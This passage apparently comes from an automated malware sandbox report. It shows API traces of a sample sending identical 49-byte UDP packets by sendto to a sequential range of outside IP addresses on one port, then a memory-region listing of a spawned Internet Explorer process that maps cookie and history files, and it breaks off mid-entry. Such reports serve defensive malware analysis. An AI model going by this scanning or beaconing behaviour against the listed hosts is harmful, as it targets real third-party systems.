flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.157"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.158"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.159"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.160"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.161"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.162"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.163"), tolen=16 | out: buf=0x378028*) returned 49 [0040.214] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.164"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.165"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.166"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.167"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.168"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.169"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.170"), tolen=16 | out: buf=0x378028*) returned 49 [0040.215] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.171"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.172"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.173"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.174"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.175"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.176"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.177"), tolen=16 | out: buf=0x378028*) returned 49 [0040.216] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.178"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.179"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.180"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.181"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.182"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.183"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.184"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.185"), tolen=16 | out: buf=0x378028*) returned 49 [0040.217] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.186"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.187"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.188"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.189"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.190"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.191"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.192"), tolen=16 | out: buf=0x378028*) returned 49 [0040.218] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.193"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.194"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.195"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.196"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.197"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.198"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.199"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.200"), tolen=16 | out: buf=0x378028*) returned 49 [0040.219] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.201"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.202"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.203"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.204"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.205"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.206"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.207"), tolen=16 | out: buf=0x378028*) returned 49 [0040.220] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.208"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.209"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.210"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.211"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.212"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.213"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.214"), tolen=16 | out: buf=0x378028*) returned 49 [0040.221] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.215"), tolen=16 | out: buf=0x378028*) returned 49 [0040.222] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.216"), tolen=16 | out: buf=0x378028*) returned 49 [0040.222] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.217"), tolen=16 | out: buf=0x378028*) returned 49 [0040.222] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.218"), tolen=16 | out: buf=0x378028*) returned 49 [0040.222] sendto (in: s=0xe0, buf=0x378028*, len=49, flags=0, to=0xa4f59c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.219"), tolen=16 | out: buf=0x378028*) returned 49 [0090.384] GetCurrentThread () returned 0xfffffffe [0090.384] GetCurrentProcess () returned 0xffffffff [0090.384] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xa4f7cc, dwDesiredAccess=0x2, bInheritHandle=1, dwOptions=0x0 | out: lpTargetHandle=0xa4f7cc*=0xd4) returned 1 [0090.384] CloseHandle (hObject=0xd4) returned 1 [0090.385] GetCurrentThreadId () returned 0xa8c [0090.385] GetLastError () returned 0x0 [0090.385] SetLastError (dwErrCode=0x0) [0090.385] FreeLibraryAndExitThread (hLibModule=0x11c0000, dwExitCode=0x0) Thread: id = 3 os_tid = 0xbcc Thread: id = 4 os_tid = 0xbd0 Thread: id = 5 os_tid = 0xbd8 Process: id = "2" image_name = "iexplore.exe" filename = "c:\\program files\\internet explorer\\iexplore.exe" page_root = "0x7ea163c0" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -nohome" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 230 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 231 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 232 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 233 start_va = 0x1210000 end_va = 0x12b5fff entry_point = 0x1210000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 234 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 235 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 236 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 237 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 238 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 239 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 240 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 241 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 242 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 243 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 244 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 245 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 246 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 247 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 248 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 249 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 250 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 251 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 252 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 253 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 254 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 255 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 256 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 257 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 258 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 259 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 260 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 261 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 262 start_va = 0xb0000 end_va = 0x177fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 263 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 264 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 265 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 266 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 267 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 268 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 269 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x3b0000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 270 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 271 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 272 start_va = 0x10d0000 end_va = 0x10d0fff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 273 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 274 start_va = 0x6cff0000 end_va = 0x6da6ffff entry_point = 0x6cff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 275 start_va = 0x72360000 end_va = 0x7239bfff entry_point = 0x72360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 276 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 277 start_va = 0x10e0000 end_va = 0x10e0fff entry_point = 0x10e0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 278 start_va = 0x10f0000 end_va = 0x10f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 279 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 280 start_va = 0x1100000 end_va = 0x1101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 281 start_va = 0x1110000 end_va = 0x1111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 282 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 283 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 284 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 285 start_va = 0x1130000 end_va = 0x115bfff entry_point = 0x1130000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 286 start_va = 0x1160000 end_va = 0x1167fff entry_point = 0x1160000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 287 start_va = 0x1170000 end_va = 0x117ffff entry_point = 0x1170000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 288 start_va = 0x1610000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 289 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 290 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 291 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 292 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 293 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 294 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 295 start_va = 0x1710000 end_va = 0x180ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 296 start_va = 0x1950000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 297 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 298 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 299 start_va = 0x1a40000 end_va = 0x1b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 300 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 301 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 302 start_va = 0x1180000 end_va = 0x1180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 303 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 304 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 305 start_va = 0x6e8a0000 end_va = 